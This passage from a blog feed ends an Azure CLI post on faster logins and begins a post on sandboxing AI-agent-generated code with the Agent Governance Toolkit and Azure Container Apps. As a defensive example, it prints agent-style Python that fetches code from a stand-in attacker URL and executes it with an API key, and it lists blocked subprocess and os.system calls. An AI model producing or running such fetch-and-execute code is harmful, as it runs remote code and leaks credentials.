&lt;LI data-line="51"&gt;Secondary: CI/CD with service principals or managed identities that already know the exact subscription, and cross-tenant guests who don't need the full catalog every login.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P data-line="53"&gt;&lt;STRONG&gt;What you'll see:&lt;/STRONG&gt;&amp;nbsp;--skip-subscription-discovery&amp;nbsp;does&amp;nbsp;&lt;STRONG&gt;not&lt;/STRONG&gt;&amp;nbsp;suppress the interactive sign-in prompt — it only skips the post-auth tenant/subscription enumeration. On an interactive login (no cached or still-valid token), the Web Account Manager (WAM) account picker still appears so you can authenticate; the flag simply skips the catalog fetch&amp;nbsp;&lt;EM&gt;after&lt;/EM&gt;&amp;nbsp;you've signed in.&lt;/P&gt;
&lt;P data-line="55"&gt;The screenshot below is Windows, where the broker (WAM) drives sign-in. On&amp;nbsp;&lt;STRONG&gt;Linux and macOS&lt;/STRONG&gt;&amp;nbsp;there's no WAM — the interactive step is a browser redirect (or a device code in headless/SSH environments) instead. The flag's behavior, and the performance win, are identical on every platform; only this sign-in UI differs.&lt;/P&gt;
&lt;img /&gt;
&lt;P data-line="57"&gt;&amp;nbsp;&lt;/P&gt;
&lt;H3 data-line="44"&gt;2. Targeted&amp;nbsp;--subscription &amp;lt;id-or-name&amp;gt;&amp;nbsp;on&amp;nbsp;az login&lt;/H3&gt;
&lt;P data-line="59"&gt;Sign in&amp;nbsp;&lt;STRONG&gt;and&lt;/STRONG&gt;&amp;nbsp;set a specific subscription as the active context in one step.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --subscription 00000000-0000-0000-0000-000000000000&lt;/P&gt;
&lt;P&gt;az login --subscription "Contoso Production"&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="66"&gt;The CLI authenticates and sets the subscription you named as active.&amp;nbsp;&lt;STRONG&gt;But note:&lt;/STRONG&gt;&amp;nbsp;on its own,&amp;nbsp;--subscription&amp;nbsp;does&amp;nbsp;&lt;STRONG&gt;not&lt;/STRONG&gt;&amp;nbsp;skip discovery — the CLI still enumerates every tenant and every subscription you have access to, and only&amp;nbsp;&lt;EM&gt;then&lt;/EM&gt;&amp;nbsp;selects the one you named as active. So if you have many subscriptions, this is still slow; you've just saved yourself a follow-up&amp;nbsp;az account set.&lt;/P&gt;
&lt;P data-line="68"&gt;To actually skip the full fetch, combine it with --skip-subscription-discovery (see below).&lt;/P&gt;
&lt;H3 data-line="65"&gt;3. The combo&lt;/H3&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --tenant &amp;lt;TENANT_ID&amp;gt; --subscription &amp;lt;SUB_ID&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P data-line="76"&gt;You get: authenticated session + active subscription set + zero tenant fan-out. With both flags, the CLI fetches&amp;nbsp;&lt;STRONG&gt;only&lt;/STRONG&gt;&amp;nbsp;the subscription you named and skips the global enumeration entirely — this is the only way to get both a pinned subscription&amp;nbsp;&lt;EM&gt;and&lt;/EM&gt; a fast login. It's the fastest path to a working CLI for a known target.&lt;/P&gt;
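&lt;P&gt;If you script your logins, the three variants above can be captured in one small helper. This is a sketch under stated assumptions: build_az_login_args is a hypothetical function name, and the only rule it encodes is the one documented in this post, that --skip-subscription-discovery requires --tenant. It only builds the argument list and does not call the CLI.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;def build_az_login_args(tenant=None, subscription=None, skip_discovery=False):
    """Build an argument list for `az login` from the options in this post."""
    # Mirror the documented rule: skipping discovery requires an explicit tenant.
    if skip_discovery and not tenant:
        raise ValueError("--skip-subscription-discovery requires --tenant")
    args = ["az", "login"]
    if tenant:
        args += ["--tenant", tenant]
    if subscription:
        args += ["--subscription", subscription]
    if skip_discovery:
        args.append("--skip-subscription-discovery")
    return args


# The IDs below are placeholders, not real tenants or subscriptions.
print(build_az_login_args(
    tenant="00000000-0000-0000-0000-000000000000",
    subscription="Contoso Production",
    skip_discovery=True,
))&lt;/LI-CODE&gt;
&lt;P&gt;The returned list can be handed to whatever process launcher you already use. How az is resolved on the PATH differs by platform, so that part is left out of the sketch.&lt;/P&gt;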
&lt;H2 data-line="67"&gt;How much faster?&lt;/H2&gt;
&lt;P data-line="82"&gt;Real-world impact scales with&amp;nbsp;&lt;STRONG&gt;how many tenants you belong to and how many subscriptions each tenant holds&lt;/STRONG&gt;&amp;nbsp;— the bigger that product, the more you save. Order-of-magnitude observations from the field:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Profile&lt;/th&gt;&lt;th&gt;Typical&amp;nbsp;az login&amp;nbsp;time&lt;/th&gt;&lt;th&gt;With&amp;nbsp;--skip-subscription-discovery&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;1 tenant, 1–3 subs (typical dev)&lt;/td&gt;&lt;td&gt;~3–5 s&lt;/td&gt;&lt;td&gt;~2–3 s&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;1 tenant, hundreds–thousands of subs&lt;/td&gt;&lt;td&gt;20–60+ s&lt;/td&gt;&lt;td&gt;~2–3 s&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Many tenants, each with hundreds+ subs (the headline case)&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;&lt;STRONG&gt;1–several minutes&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;&lt;STRONG&gt;~2–3 s&lt;/STRONG&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;CI/CD with service principal, 1 known sub&lt;/td&gt;&lt;td&gt;5–10 s&lt;/td&gt;&lt;td&gt;~1 s&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="91"&gt;The savings come entirely from cutting the per-tenant ARM enumeration — and they grow the more tenants and subscriptions you have.&lt;/P&gt;
&lt;H2 data-line="82"&gt;When&amp;nbsp;&lt;EM&gt;not&lt;/EM&gt;&amp;nbsp;to use these flags&lt;/H2&gt;
&lt;UL data-line="97"&gt;
&lt;LI data-line="99"&gt;&lt;STRONG&gt;You genuinely don't know which subscription you need&lt;/STRONG&gt;&amp;nbsp;and rely on&amp;nbsp;az account list&amp;nbsp;/&amp;nbsp;az account set&amp;nbsp;after login to pick. Plain&amp;nbsp;az login&amp;nbsp;is still the right call.&lt;/LI&gt;
&lt;LI data-line="100"&gt;&lt;STRONG&gt;You manage resources across many subscriptions in one session.&lt;/STRONG&gt;&amp;nbsp;Without discovery,&amp;nbsp;az account list&amp;nbsp;will be empty and tab-completion of subscriptions won't work. (Tip: run a one-time&amp;nbsp;az account list --refresh&amp;nbsp;later to populate.)&lt;/LI&gt;
&lt;LI data-line="101"&gt;&lt;STRONG&gt;First-time setup on a new machine&lt;/STRONG&gt; where you want to see what you have access to.&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="111"&gt;Try it now&lt;/H2&gt;
&lt;P data-line="107"&gt;Make sure you're on Azure CLI 2.86.0 or later:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az version&lt;/P&gt;
&lt;P&gt;az upgrade # if needed&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
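&lt;P&gt;In automation, the version check can be scripted instead of read by eye. The sketch below assumes the JSON that az version prints includes an "azure-cli" key with a plain numeric major.minor.patch string. The function name supports_skip_discovery is hypothetical, and the sample payloads are made up rather than captured from a real machine.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import json

MINIMUM_VERSION = (2, 86, 0)  # first release with the flag, per this post


def supports_skip_discovery(az_version_output):
    """Return True if `az version` JSON output reports 2.86.0 or later."""
    version_text = json.loads(az_version_output)["azure-cli"]
    # Compare only the numeric major.minor.patch components.
    parsed = tuple(int(part) for part in version_text.split(".")[:3])
    return parsed >= MINIMUM_VERSION


# Sample payloads shaped like `az version` output (values are made up).
print(supports_skip_discovery('{"azure-cli": "2.86.0"}'))
print(supports_skip_discovery('{"azure-cli": "2.75.1"}'))&lt;/LI-CODE&gt;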
&lt;P data-line="114"&gt;Then:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;az login --tenant &amp;lt;your-tenant&amp;gt; --subscription &amp;lt;your-sub&amp;gt; --skip-subscription-discovery&lt;/P&gt;
&lt;P&gt;az group list -o table&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H2 data-line="129"&gt;Links &amp;amp; references&lt;/H2&gt;
&lt;UL data-line="144"&gt;
&lt;LI data-line="125"&gt;&lt;STRONG&gt;az login&amp;nbsp;reference (official docs)&lt;/STRONG&gt;&amp;nbsp;— full flag list including&amp;nbsp;--skip-subscription-discovery&amp;nbsp;/&amp;nbsp;--skip-sub&amp;nbsp;and&amp;nbsp;--subscription:&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login" data-href="https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login" target="_blank"&gt;https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="126"&gt;&lt;STRONG&gt;Sign in with Azure CLI (how-to)&lt;/STRONG&gt;&amp;nbsp;—&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli" data-href="https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli" target="_blank"&gt;https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli&lt;/A&gt;&lt;/LI&gt;
&lt;LI data-line="127"&gt;&lt;STRONG&gt;Azure CLI release notes&lt;/STRONG&gt;&amp;nbsp;—&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/cli/azure/release-notes-azure-cli" data-href="https://learn.microsoft.com/en-us/cli/azure/release-notes-azure-cli" target="_blank"&gt;https://learn.microsoft.com/en-us/cli/azure/release-notes-azure-cli&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="138"&gt;Feedback wanted&lt;/H2&gt;
&lt;P data-line="152"&gt;If this changes your day-to-day login experience —&amp;nbsp;&lt;STRONG&gt;especially if you live across many tenants with hundreds or thousands of subscriptions&lt;/STRONG&gt;&amp;nbsp;— we'd love to hear from you. Concrete before/after timings for those high-scale topologies are gold.&lt;/P&gt;
&lt;UL data-line="154"&gt;
&lt;LI data-line="135"&gt;&lt;STRONG&gt;Found a bug or have a feature request?&lt;/STRONG&gt;&amp;nbsp;File an issue on the Azure CLI repo:&amp;nbsp;&lt;A href="https://github.com/Azure/azure-cli/issues/new/choose" data-href="https://github.com/Azure/azure-cli/issues/new/choose" target="_blank"&gt;https://github.com/Azure/azure-cli/issues/new/choose&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Sun, 07 Jun 2026 07:19:58 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-tools-blog/faster-az-login-introducing-skip-subscription-discovery-and/ba-p/4526116</guid>
      <dc:creator>Alex-wdy</dc:creator>
      <dc:date>2026-06-07T07:19:58Z</dc:date>
    </item>
    <item>
      <title>Govern AI Agents Using Agent Governance Toolkit and Azure Container App Sandboxes</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/govern-ai-agents-using-agent-governance-toolkit-and-azure/ba-p/4526011</link>
      <description>&lt;P&gt;When you let a model generate code and you actually execute it, you are handing the model a Python REPL on whatever machine runs the agent. That sounds alarmist — right up until a planner (yours, mine, or anyone else's) produces a snippet that reads as harmless on the first pass:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;# "summarize the changelog"
import urllib.request, os
data = urllib.request.urlopen(
    "https://gist.githubusercontent.com/attacker/.../raw"
).read()
exec(data, {"OPENAI_API_KEY": os.environ["OPENAI_API_KEY"]})&lt;/LI-CODE&gt;
&lt;P data-line="20"&gt;Two lines of mostly-stdlib Python. If it runs in your application process, the model just decided it could pull arbitrary code off the internet and pass your secrets into it. Today that's a hypothetical; tomorrow it's a postmortem.&lt;/P&gt;
&lt;P data-line="25"&gt;The defense splits into two questions developers can actually answer:&lt;/P&gt;
&lt;OL data-line="27"&gt;
&lt;LI data-line="27"&gt;&lt;STRONG&gt;Where does the code run?&lt;/STRONG&gt;&amp;nbsp;Not in your process. A&amp;nbsp;&lt;EM&gt;sandbox&lt;/EM&gt;&amp;nbsp;— a separate, disposable execution environment with its own CPU, memory, filesystem and network — gives you a hard boundary so a bad snippet can crash itself, not your service. Sandboxes have shipped in many flavors (containers, micro-VMs, wasm); the new one in this post is&amp;nbsp;&lt;STRONG&gt;Azure Container Apps sandbox&lt;/STRONG&gt;, where each agent session gets a managed, per-session container with a fail-closed egress proxy in front, scaled and operated by Azure.&lt;/LI&gt;
&lt;LI data-line="35"&gt;&lt;STRONG&gt;What is the code allowed to do?&lt;/STRONG&gt;&amp;nbsp;A sandbox alone is a wide playing field — an attacker who wins a sandbox still has the whole sandbox.&amp;nbsp;&lt;EM&gt;Policy&lt;/EM&gt;&amp;nbsp;narrows the field. A single YAML&amp;nbsp;PolicyDocument&amp;nbsp;says: these tools, these hosts, these CPU / memory / time budgets, no&amp;nbsp;subprocess, no&amp;nbsp;pip install, no substring match on&amp;nbsp;OPENAI_API_KEY. The first cut is enforced&amp;nbsp;&lt;STRONG&gt;on the host by AGT policy&lt;/STRONG&gt;&amp;nbsp;(deny rules, tool allowlist, AST scan) so denied snippets never even leave your process; the network cut is enforced&amp;nbsp;&lt;STRONG&gt;inside the ACA sandbox by the egress allowlist&lt;/STRONG&gt;&amp;nbsp;so an outbound call to a non-allowed host fails closed at the proxy. Same document, two layers, no drift.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P data-line="47"&gt;&lt;A class="lia-external-url" href="https://github.com/microsoft/agent-governance-toolkit" target="_blank" rel="noopener"&gt;AGT &lt;/A&gt;ships a Python package, agt-sandbox, that answers both questions, along with a new sandbox provider for Azure Container Apps sandboxes, which were recently announced at Build 2026. The rest of this post walks through what's in the agt-sandbox package, the abstraction it pivots on, the new ACA provider, how it composes with AGT policy, and a full LLM-planned research agent built on top.&lt;/P&gt;
&lt;H2 data-line="56"&gt;1. What is Azure Container Apps sandbox?&lt;/H2&gt;
&lt;P data-line="58"&gt;&lt;A href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131" target="_blank" rel="noopener" data-href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131"&gt;Azure Container Apps Sandboxes&lt;/A&gt;&amp;nbsp;(public preview, June 2, 2026) are a first-class Azure resource —&amp;nbsp;Microsoft.App/SandboxGroups&amp;nbsp;— purpose-built for running untrusted, agent-generated code. Each sandbox runs in its own&amp;nbsp;&lt;STRONG&gt;hardware-isolated microVM&lt;/STRONG&gt;, boots in sub-second time from an OCI disk image, and can suspend/resume from full memory + disk snapshots for scale-to-zero economics on stateful compute. It's the same primitive that powers Cloud sandboxes in GitHub Copilot, Foundry Hosted Agents, and ACA Express.&lt;/P&gt;
&lt;P data-line="68"&gt;See&amp;nbsp;&lt;A href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131" target="_blank" rel="noopener" data-href="https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131"&gt;https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131&lt;/A&gt;&amp;nbsp;for more information on the service.&lt;/P&gt;
&lt;P data-line="71"&gt;If you've used&amp;nbsp;&lt;A href="https://learn.microsoft.com/en-us/azure/container-apps/sessions" target="_blank" rel="noopener" data-href="https://learn.microsoft.com/en-us/azure/container-apps/sessions"&gt;ACA Dynamic Sessions&lt;/A&gt;, Sandboxes are the next evolution and the place to target new work.&lt;/P&gt;
&lt;H2 data-line="76"&gt;2. What's in the agt-sandbox package&lt;/H2&gt;
&lt;P data-line="78"&gt;agt-sandbox (PyPI:&amp;nbsp;&lt;A href="https://pypi.org/project/agt-sandbox/" target="_blank" rel="noopener" data-href="https://pypi.org/project/agt-sandbox/"&gt;agt-sandbox&lt;/A&gt;, import name:&amp;nbsp;agent_sandbox) is the execution-isolation layer of AGT. It is intentionally small. Its job is to take a snippet of agent-generated code and run it somewhere that is&amp;nbsp;&lt;STRONG&gt;not&lt;/STRONG&gt;&amp;nbsp;your application process, under policy and with a structured result.&lt;/P&gt;
&lt;P data-line="84"&gt;The package contains:&lt;/P&gt;
&lt;UL data-line="86"&gt;
&lt;LI data-line="86"&gt;&lt;STRONG&gt;SandboxProvider&lt;/STRONG&gt;&amp;nbsp;— the abstract base class every backend implements (next section).&lt;/LI&gt;
&lt;LI data-line="88"&gt;&lt;STRONG&gt;Three built-in providers&lt;/STRONG&gt;, each gated behind an install extra so you only pull what you need:
&lt;UL data-line="90"&gt;
&lt;LI data-line="90"&gt;DockerSandboxProvider&amp;nbsp;— hardened OCI containers, with an optional auto-upgrade to gVisor or Kata when present (pip install "agt-sandbox[docker]").&lt;/LI&gt;
&lt;LI data-line="93"&gt;HyperLightSandboxProvider&amp;nbsp;— sub-millisecond&amp;nbsp;&lt;A href="https://github.com/hyperlight-dev/hyperlight" target="_blank" rel="noopener" data-href="https://github.com/hyperlight-dev/hyperlight"&gt;Hyperlight&lt;/A&gt;&amp;nbsp;micro-VMs over KVM / mshv / WHP (pip install "agt-sandbox[hyperlight]").&lt;/LI&gt;
&lt;LI data-line="96"&gt;ACASandboxProvider&amp;nbsp;— Azure Container Apps managed sandbox sessions (pip install "agt-sandbox[azure]");&amp;nbsp;&lt;STRONG&gt;the focus of this post&lt;/STRONG&gt;.&lt;/LI&gt;
&lt;/UL&gt;
&lt;/LI&gt;
&lt;LI data-line="99"&gt;&lt;STRONG&gt;Shared dataclasses&lt;/STRONG&gt;&amp;nbsp;—&amp;nbsp;SandboxConfig,&amp;nbsp;SandboxResult,&amp;nbsp;SessionHandle,&amp;nbsp;ExecutionHandle, plus&amp;nbsp;SessionStatus&amp;nbsp;/&amp;nbsp;ExecutionStatus&amp;nbsp;enums. Every provider returns these same types, so calling code never special-cases the backend.&lt;/LI&gt;
&lt;LI data-line="104"&gt;&lt;STRONG&gt;Policy-projection helpers&lt;/STRONG&gt; — small per-provider functions (docker_config_from_policy,&amp;nbsp;aca_config_from_policy, …) that translate the AGT&amp;nbsp;PolicyDocument&amp;nbsp;into provider-native settings (CPU / memory caps, egress rules, env vars).&lt;/LI&gt;
&lt;/UL&gt;
&lt;H2 data-line="112"&gt;3. The&amp;nbsp;SandboxProvider&amp;nbsp;ABC&lt;/H2&gt;
&lt;P data-line="114"&gt;SandboxProvider is the contract every backend implements. The abstract surface is deliberately minimal:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from abc import ABC, abstractmethod

# SessionHandle and ExecutionHandle are the shared dataclasses listed above.


class SandboxProvider(ABC):
    @abstractmethod
    def create_session(self, agent_id, policy=None, config=None) -&amp;gt; SessionHandle: ...

    @abstractmethod
    def execute_code(self, agent_id, session_id, code, *, context=None) -&amp;gt; ExecutionHandle: ...

    @abstractmethod
    def destroy_session(self, agent_id, session_id) -&amp;gt; None: ...

    @abstractmethod
    def is_available(self) -&amp;gt; bool: ...&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P data-line="132"&gt;Every method has an&amp;nbsp;*_async&amp;nbsp;variant that delegates to the sync implementation through&amp;nbsp;asyncio.to_thread&amp;nbsp;by default, so an async agent can call&amp;nbsp;await provider.execute_code_async(...)&amp;nbsp;without each provider having to ship its own event-loop story.&lt;/P&gt;
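&lt;P&gt;The delegation pattern described above can be sketched in a few lines. This is an illustration, not AGT's source: BlockingRunner is a hypothetical stand-in for a provider, and its execute_code takes a single argument to keep the example short. The only real API used is asyncio.to_thread from the standard library (Python 3.9 or later).&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import asyncio


class BlockingRunner:
    """Hypothetical stand-in for a provider with a blocking method."""

    def execute_code(self, code):
        # Pretend this blocks on a sandbox round trip.
        return f"ran: {code}"

    async def execute_code_async(self, code):
        # Default async variant: run the sync method in a worker thread.
        return await asyncio.to_thread(self.execute_code, code)


async def main():
    runner = BlockingRunner()
    return await runner.execute_code_async("print(1)")


print(asyncio.run(main()))&lt;/LI-CODE&gt;
&lt;P&gt;Because the blocking call runs in a worker thread, the event loop stays free to service other coroutines while the sandbox round trip is in flight.&lt;/P&gt;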
&lt;P data-line="137"&gt;The contract features four things, and writing against the ABC means you get all of them no matter which backend is plugged in:&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Feature&lt;/th&gt;&lt;th&gt;What it means&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Per-session isolation&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;One&amp;nbsp;(agent_id, session_id)&amp;nbsp;pair maps to exactly one sandbox; concurrent agents do not share state&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Policy as a first-class argument&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;create_session&amp;nbsp;accepts a&amp;nbsp;PolicyDocument; the provider projects it onto its native primitives&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Host-side&amp;nbsp;PolicyEvaluator&amp;nbsp;gate&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Every&amp;nbsp;execute_code&amp;nbsp;call runs the evaluator&amp;nbsp;&lt;STRONG&gt;before&lt;/STRONG&gt;&amp;nbsp;dispatching code; denied calls never touch the backend&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;STRONG&gt;Structured&amp;nbsp;SandboxResult&lt;/STRONG&gt;&lt;/td&gt;&lt;td&gt;Same success / exit_code / stdout / stderr / killed / kill_reason / duration_seconds shape from all backends&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 50.00%" /&gt;&lt;col style="width: 50.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P data-line="147"&gt;Per-session isolation is the right unit of granularity because a session is also the natural unit for blast radius and identity: within one session the agent's working state survives across execute_code calls (same (agent_id, session_id) → same sandbox in the provider's cache), and when the session is destroyed the sandbox is deleted with it. Different sessions get different sandboxes — create_session always provisions a fresh one and returns a new session_id, so there is no in-process pathway for state to flow from one session to the next.&lt;/P&gt;
&lt;P data-line="157"&gt;The hard isolation between two live sandboxes — that a compromised session cannot read another session's filesystem, memory, or network — is ultimately an&amp;nbsp;&lt;STRONG&gt;Azure platform guarantee&lt;/STRONG&gt;&amp;nbsp;about inter-sandbox isolation within a sandbox group, not something AGT itself enforces. The provider is a thin lifecycle driver.&lt;/P&gt;
&lt;P data-line="163"&gt;The abstraction matters in practice because&amp;nbsp;&lt;STRONG&gt;the same agent code works on every backend&lt;/STRONG&gt;. You write your planner against SandboxProvider, then choose Docker or Hyperlight for local sandboxes, or ACA for managed cloud sandboxes, by swapping one constructor.&lt;/P&gt;
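&lt;P&gt;A toy version of that idea, using stand-in classes rather than the real providers (whose constructor arguments are not reproduced here). ToyProvider, UpperCaseBackend, ReversedBackend, and run_plan are all hypothetical names, and the backends transform a string instead of executing code. The point is only that the calling code never changes.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;from abc import ABC, abstractmethod


class ToyProvider(ABC):
    """Hypothetical, trimmed-down analogue of the SandboxProvider contract."""

    @abstractmethod
    def execute_code(self, agent_id, session_id, code): ...


class UpperCaseBackend(ToyProvider):
    def execute_code(self, agent_id, session_id, code):
        return code.upper()


class ReversedBackend(ToyProvider):
    def execute_code(self, agent_id, session_id, code):
        return code[::-1]


def run_plan(provider, steps):
    """Agent-side code: depends only on the abstract contract."""
    return [provider.execute_code("agent-1", "session-1", step) for step in steps]


# Swapping the backend is a one-line change at construction time.
print(run_plan(UpperCaseBackend(), ["abc"]))
print(run_plan(ReversedBackend(), ["abc"]))&lt;/LI-CODE&gt;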
&lt;H2 data-line="171"&gt;4. The new&amp;nbsp;ACASandboxProvider&lt;/H2&gt;
&lt;P data-line="173"&gt;ACASandboxProvider&amp;nbsp;is the most recent addition in AGT. It drives the early-access&amp;nbsp;&lt;A href="https://github.com/microsoft/azure-container-apps" target="_blank" rel="noopener" data-href="https://github.com/microsoft/azure-container-apps"&gt;azure-containerapps-sandbox&lt;/A&gt;&amp;nbsp;Python SDK so an agent step can run in a managed Azure-side container without any of the usual infrastructure plumbing.&lt;/P&gt;
&lt;P data-line="179"&gt;Under the hood,&amp;nbsp;ACASandboxProvider&amp;nbsp;wires the three&amp;nbsp;SandboxProvider&amp;nbsp;lifecycle methods straight onto the ACA SDK. Here's what each one actually does for you:&lt;/P&gt;
&lt;P data-line="185"&gt;&lt;STRONG&gt;create_session(agent_id, policy=None, config=None)&lt;/STRONG&gt;&amp;nbsp;— provisions a fresh ACA sandbox for the agent and applies the policy's resource caps and egress allowlist.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;a&amp;nbsp;SessionHandle.&lt;/P&gt;
&lt;P data-line="189"&gt;&lt;STRONG&gt;execute_code(agent_id, session_id, code, *, context=None)&lt;/STRONG&gt;&amp;nbsp;— runs host-side policy checks, then executes the snippet inside the sandbox. A policy denial raises&amp;nbsp;PermissionError.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;an&amp;nbsp;ExecutionHandle&amp;nbsp;carrying a&amp;nbsp;SandboxResult.&lt;/P&gt;
&lt;P data-line="194"&gt;&lt;STRONG&gt;destroy_session(agent_id, session_id)&lt;/STRONG&gt;&amp;nbsp;— deletes the underlying ACA sandbox and evicts cached state.&amp;nbsp;&lt;EM&gt;Returns&lt;/EM&gt;&amp;nbsp;None.&lt;/P&gt;
&lt;P data-line="197"&gt;The lifecycle in code looks like this:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import os

from agent_sandbox import ACASandboxProvider
from agent_os.policies import PolicyDocument

policy = PolicyDocument.from_yaml("policies/aca_research_agent.yaml")

provider = ACASandboxProvider(
    resource_group=os.environ["AZURE_RG"],
    sandbox_group="agents",
    region=os.environ["AZURE_REGION"],
    disk="python-3.13",  # constructor-level, not per-session
    ensure_group_location=os.environ["AZURE_REGION"],
)

# create_session takes (agent_id, policy=..., config=...). The policy carries
# the network allowlist and the CPU/memory/timeout defaults.
handle = provider.create_session("research-agent-1", policy=policy)

# execute_code takes (agent_id, session_id, code, *, context=...).
# The timeout is read from the session config that was projected from
# policy.defaults.timeout_seconds at create_session time.
exec_handle = provider.execute_code(
    "research-agent-1",
    handle.session_id,
    "import urllib.request as u; print(u.urlopen('https://arxiv.org').status)",
    context={"intent": "smoke-test arxiv reachability"},
)
print(exec_handle.result.stdout)

provider.destroy_session("research-agent-1", handle.session_id)&lt;/LI-CODE&gt;
&lt;P data-line="232"&gt;ACA Sandboxes hit the sweet spot for a production agent platform on Azure: managed (no nodes or Kubernetes to operate), regional and autoscaled, fast enough for per-session creation, integrated with VNet / managed identity / Log Analytics, and rich enough on Azure-native primitives that the AGT policy bundle can be rendered into platform-level controls automatically.&lt;/P&gt;
&lt;H2 data-line="241"&gt;5. How&amp;nbsp;ACASandboxProvider&amp;nbsp;integrates with Agent Governance Toolkit policy&lt;/H2&gt;
&lt;P data-line="243"&gt;The provider's contribution to governance is that it enforces a single&amp;nbsp;PolicyDocument&amp;nbsp;in three different places, with the most expensive checks running last.&lt;/P&gt;
&lt;P data-line="247"&gt;&lt;STRONG&gt;Before any Azure round-trip (host-side, in your process):&lt;/STRONG&gt;&lt;/P&gt;
&lt;OL data-line="249"&gt;
&lt;LI data-line="249"&gt;The host-side&amp;nbsp;PolicyEvaluator&amp;nbsp;(constructed once per session) evaluates&amp;nbsp;deny&amp;nbsp;rules over&amp;nbsp;code&amp;nbsp;/&amp;nbsp;tool_name,&amp;nbsp;tool_allowlist, and the per-call&amp;nbsp;context. A deny becomes&amp;nbsp;PermissionError. This runs on&amp;nbsp;&lt;STRONG&gt;every&lt;/STRONG&gt;&amp;nbsp;execute_code&amp;nbsp;call, so a denied step costs zero Azure cycles.&lt;/LI&gt;
&lt;LI data-line="254"&gt;enforce_no_subprocess_execution then walks the snippet's AST and raises SandboxCodeViolation if subprocess.*, os.system, os.execve, os.spawn*, or wildcard imports of those modules appear. This catches the cases that a&amp;nbsp;contains&amp;nbsp;rule misses (e.g. obfuscated imports such as from subprocess import Popen as p).&lt;/LI&gt;
&lt;/OL&gt;
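&lt;P&gt;To show why an AST walk catches what a substring rule can miss, here is a minimal sketch built on Python's standard ast module. It is not AGT's enforce_no_subprocess_execution: find_subprocess_use and the two blocklists are hypothetical, the check is deliberately incomplete (it does not follow aliases such as import os as o), and it returns a list instead of raising.&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import ast

BLOCKED_MODULES = {"subprocess"}
BLOCKED_OS_CALLS = {"system", "execve"}


def find_subprocess_use(code):
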